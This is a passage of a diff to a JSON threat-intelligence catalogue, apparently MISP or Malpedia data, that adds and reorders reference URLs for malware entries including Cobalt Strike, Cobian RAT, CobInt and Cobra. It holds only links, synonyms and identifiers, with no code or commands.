+ "https://blog.nviso.eu/2021/11/17/cobalt-strike-decrypting-obfuscated-traffic-part-4/",
+ "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos",
+ "https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728",
+ "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
+ "https://blog.nviso.eu/2022/03/22/cobalt-strike-overview-part-7/",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
+ "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9",
+ "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
+ "https://morphuslabs.com/attackers-are-abusing-msbuild-to-evade-defenses-and-implant-cobalt-strike-beacons-edac4ab84f42",
+ "https://thedfirreport.com/2022/04/25/quantum-ransomware/",
+ "https://blog.morphisec.com/proxyshell-exchange-exploitation-now-leads-to-an-increasing-amount-of-cobaltstrike-backdoors",
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
+ "https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/",
+ "https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/",
+ "https://www.ic3.gov/Media/News/2021/210823.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-waterfall",
+ "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/",
+ "https://www.ironnet.com/blog/ransomware-graphic-blog",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation",
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
+ "https://unit42.paloaltonetworks.com/cobalt-strike-memory-analysis/",
+ "https://forensicitguy.github.io/inspecting-powershell-cobalt-strike-beacon/",
+ "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/",
+ "https://wbglil.gitbook.io/cobalt-strike/",
+ "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/",
+ "https://skyblue.team/posts/scanning-virustotal-firehose/",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/harvester-new-apt-attacks-asia",
+ "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf",
+ "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
+ "https://msrc.microsoft.com/blog/2022/10/hunting-for-cobalt-strike-mining-and-plotting-for-fun-and-profit/",
+ "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b",
+ "https://twitter.com/elisalem9/status/1398566939656601606",
+ "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
+ "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/",
+ "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government",
+ "https://thehackernews.com/2022/05/this-new-fileless-malware-hides.html",
+ "https://binary.ninja/2022/07/22/reverse-engineering-cobalt-strike.html",
+ "https://medium.com/walmartglobaltech/cobaltstrike-uuid-stager-ca7e82f7bb64",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-threat-hunters-identified-a-confluence-exploit/",
+ "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/",
+ "https://www.varonis.com/blog/hive-ransomware-analysis",
+ "https://securelist.com/apt-luminousmoth/103332/",
+ "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/",
+ "https://michaelkoczwara.medium.com/mapping-and-pivoting-cobalt-strike-c2-infrastructure-attributed-to-cve-2021-40444-438786fcd68a",
+ "https://quake.360.cn/quake/#/reportDetail?id=5fc6fedd191038c3b25c4950",
+ "https://thedfirreport.com/2020/10/08/ryuks-return/",
+ "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent",
+ "https://www.youtube.com/watch?v=y65hmcLIWDY",
+ "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
+ "https://cyber.wtf/2022/03/23/what-the-packer/",
+ "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/",
+ "https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "https://www.youtube.com/watch?v=WW0_TgWT2gs",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://zero.bs/cobaltstrike-beacons-analyzed.html",
+ "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/",
+ "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/",
+ "https://connormcgarr.github.io/thread-hijacking/",
+ "https://isc.sans.edu/diary/rss/28448",
+ "https://www.youtube.com/watch?v=FC9ARZIZglI",
+ "https://web.br.de/interaktiv/ocean-lotus/en/",
+ "https://community.riskiq.com/article/0bcefe76",
+ "https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/",
+ "https://www.mdsec.co.uk/2021/07/investigating-a-suspicious-service/",
+ "https://blog.morphisec.com/vmware-identity-manager-attack-backdoor",
+ "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://breakpoint-labs.com/blog/cobalt-strike-and-ransomware-tracking-an-effective-ransomware-campaign/",
+ "https://twitter.com/AltShiftPrtScn/status/1385103712918642688",
+ "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader",
+ "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html",
+ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://elastic.github.io/security-research/intelligence/2022/01/02.collecting-cobalt-strike-beacons/article/",
+ "https://www.youtube.com/watch?v=6SDdUVejR2w",
+ "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one",
+ "https://marcoramilli.com/2022/05/10/a-malware-analysis-in-ru-au-conflict/",
+ "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
+ "https://twitter.com/ffforward/status/1324281530026524672",
+ "https://redcanary.com/blog/intelligence-insights-december-2021",
+ "https://kienmanowar.wordpress.com/2022/06/04/quicknote-cobaltstrike-smb-beacon-analysis-2/",
+ "https://www.malware-traffic-analysis.net/2021/09/17/index.html",
+ "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
+ "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
+ "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
+ "https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/",
+ "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
+ "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot",
+ "https://blog.morphisec.com/log4j-exploit-hits-again-vulnerable-vmware-horizon-servers-at-risk",
+ "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
+ "https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929",
+ "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
+ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf",
+ "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
+ "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/",
+ "https://twitter.com/MBThreatIntel/status/1412518446013812737",
+ "https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/",
+ "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a",
+ "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love",
+ "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html",
+ "https://www.getrevue.co/profile/80vul/issues/hunting-cobalt-strike-dns-redirectors-by-using-zoomeye-580734",
+ "https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/",
+ "https://twitter.com/GossiTheDog/status/1438500100238577670",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "https://asec.ahnlab.com/en/31811/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam",
+ "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
+ "https://blog.talosintelligence.com/2021/11/attackers-use-domain-fronting-technique.html",
+ "https://cert.gov.ua/article/37704",
+ "https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive",
+ "https://www.lac.co.jp/lacwatch/people/20180521_001638.html",
+ "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/",
+ "https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/",
+ "https://twitter.com/RedDrip7/status/1402640362972147717?s=20",
+ "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/",
+ "https://twitter.com/swisscom_csirt/status/1354052879158571008",
+ "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/",
+ "https://isc.sans.edu/diary/28636",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/",
+ "https://redcanary.com/blog/getsystem-offsec/",
+ "https://www.mandiant.com/resources/evolution-of-fin7",
+ "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
+ "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations",
+ "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
+ "https://isc.sans.edu/diary/rss/26862",
+ "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html",
+ "https://isc.sans.edu/diary/26752",
+ "https://redcanary.com/blog/grief-ransomware/",
+ "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf",
+ "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html",
+ "https://therecord.media/mongolian-certificate-authority-hacked-eight-times-compromised-with-malware/",
+ "https://malwarelab.eu/posts/fin6-cobalt-strike/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang",
+ "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
+ "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/",
+ "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
+ "https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/",
+ "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
+ "https://asec.ahnlab.com/ko/19640/",
+ "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-machine-learning-and-277c4c30304f",
+ "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://www.domaintools.com/resources/blog/covid-19-phishing-with-a-side-of-cobalt-strike#",
+ "https://twitter.com/MsftSecIntel/status/1522690116979855360",
+ "https://www.secureworks.com/blog/detecting-cobalt-strike-government-sponsored-threat-groups",
+ "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/",
+ "https://twitter.com/cglyer/status/1480742363991580674",
+ "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
+ "https://github.com/dodo-sec/Malware-Analysis/blob/main/Cobalt%20Strike/Indirect%20Syscalls.md",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf",
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/",
+ "https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html",
+ "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
+ "https://blogs.blackberry.com/en/2021/10/blackberry-shines-spotlight-on-evolving-cobalt-strike-threat-in-new-book",
+ "https://twitter.com/th3_protoCOL/status/1433414685299142660?s=20",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
+ "https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/",
+ "https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/",
+ "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
+ "https://www.crowdstrike.com/blog/how-falcon-complete-disrupts-ecrime-operators-wizard-spider/",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://blog.nviso.eu/2021/10/27/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-2/",
+ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
+ "https://twitter.com/alex_lanstein/status/1399829754887524354",
+ "https://blog.group-ib.com/colunmtk_apt41",
+ "https://www.blackhillsinfosec.com/dns-over-https-for-cobalt-strike/",
+ "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/",
+ "https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/",
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf",
+ "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures",
+ "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/",
+ "https://asec.ahnlab.com/en/34549/",
+ "https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
+ "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://blog.group-ib.com/apt41-world-tour-2021",
+ "https://www.youtube.com/watch?v=C733AyPzkoc",
+ "https://blog.group-ib.com/opera1er-apt",
+ "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
+ "https://twitter.com/felixw3000/status/1521816045769662468",
+ "https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/",
+ "https://malware-traffic-analysis.net/2021/09/29/index.html",
+ "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/",
+ "https://inteloperator.medium.com/the-default-63-6f-62-61-6c-74-strike-8ac9ee0de1b7",
+ "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/",
+ "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/",
+ "https://www.guidepointsecurity.com/yet-another-cobalt-strike-loader-guid-edition/",
+ "https://www.mandiant.com/media/12596/download",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/",
+ "https://explore.group-ib.com/htct/hi-tech_crime_2018",
+ "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
+ "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/",
+ "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468",
+ "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618",
+ "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/",
+ "https://attack.mitre.org/groups/G0096",
+ "https://blog.didierstevens.com/2021/11/03/new-tool-cs-extract-key-py/",
+ "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
+ "https://www.macnica.net/file/mpression_automobile.pdf",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://medium.com/@shabarkin/pointer-hunting-cobalt-strike-globally-a334ac50619a",
+ "https://twitter.com/VK_Intel/status/1294320579311435776",
+ "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/",
+ "https://thedfirreport.com/2021/05/12/conti-ransomware/",
+ "https://vanmieghem.io/blueprint-for-evading-edr-in-2022/",
+ "https://www.prevailion.com/what-wicked-webs-we-unweave/",
+ "https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://unit42.paloaltonetworks.com/cobalt-strike-team-server/",
+ "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/",
+ "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
+ "https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://securityscorecard.com/blog/securityscorecard-finds-usaid-hack-much-larger-than-initially-thought",
+ "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/",
+ "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
+ "https://github.com/Apr4h/CobaltStrikeScan",
+ "https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encryption-decryption/",
+ "https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise",
+ "https://github.com/infinitumitlabs/Karakurt-Hacking-Team-CTI",
+ "https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/",
+ "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/",
+ "https://blog.nviso.eu/2021/11/03/cobalt-strike-using-process-memory-to-decrypt-traffic-part-3/",
+ "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/",
+ "https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/",
+ "https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf",
+ "https://www.deepinstinct.com/2021/03/18/cobalt-strike-post-exploitation-attackers-toolkit/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html",
+ "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
+ "https://blog.cobaltstrike.com/",
+ "https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/",
+ "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html",
+ "https://www.intezer.com/blog/malware-analysis/cobalt-strike-detect-this-persistent-threat/",
+ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
+ "https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encoding-decoding/",
+ "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a",
+ "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
+ "https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/",
+ "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
+ "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/",
+ "https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/",
+ "https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/",
+ "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
+ "https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/",
+ "https://socfortress.medium.com/detecting-cobalt-strike-beacons-3f8c9fdcb654",
+ "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf",
+ "https://boschko.ca/cobalt-strike-process-injection/",
+ "https://twitter.com/AltShiftPrtScn/status/1350755169965924352",
+ "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/",
+ "https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads",
+ "https://news.sophos.com/en-us/2021/05/05/intervention-halts-a-proxylogon-enabled-attack",
+ "https://www.youtube.com/watch?v=borfuQGrB8g",
+ "https://cert.gov.ua/article/339662",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
+ "https://www.mandiant.com/resources/spear-phish-ukrainian-entities",
+ "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
+ "https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/",
+ "https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/",
+ "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A",
+ "https://redcanary.com/blog/gootloader",
+ "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41",
+ "https://www.secureworks.com/research/threat-profiles/bronze-president",
+ "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-ml-and-kql-part-2-bff46cfc1e7e"
],
"synonyms": [
"Agentemis",
@@ -17644,15 +18761,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "97f26fab-af0e-4da9-b4c1-aec70cace22d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550",
"value": "Cobalt Strike"
},
@@ -17661,9 +18769,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat",
- "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html",
+ "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/",
"https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat",
- "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/"
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html"
],
"synonyms": [],
"type": []
@@ -17676,15 +18785,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint",
- "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
"https://asert.arbornetworks.com/double-the-infection-double-the-fun/",
- "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint",
- "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.group-ib.com/blog/renaissance",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/cobalt_upd_ttps/",
- "https://www.netscout.com/blog/asert/double-infection-double-fun"
+ "https://www.netscout.com/blog/asert/double-infection-double-fun",
+ "https://www.group-ib.com/blog/renaissance",
+ "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint",
+ "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "http://www.secureworks.com/research/threat-profiles/gold-kingswood"
],
"synonyms": [
"COOLPANTS"
@@ -17699,21 +18808,22 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra",
- "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf",
- "https://docs.broadcom.com/doc/waterbug-attack-group",
- "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf",
- "https://github.com/sisoma2/malware_analysis/tree/master/turla_carbon",
- "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
- "https://www.secureworks.com/research/threat-profiles/iron-hunter",
- "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra",
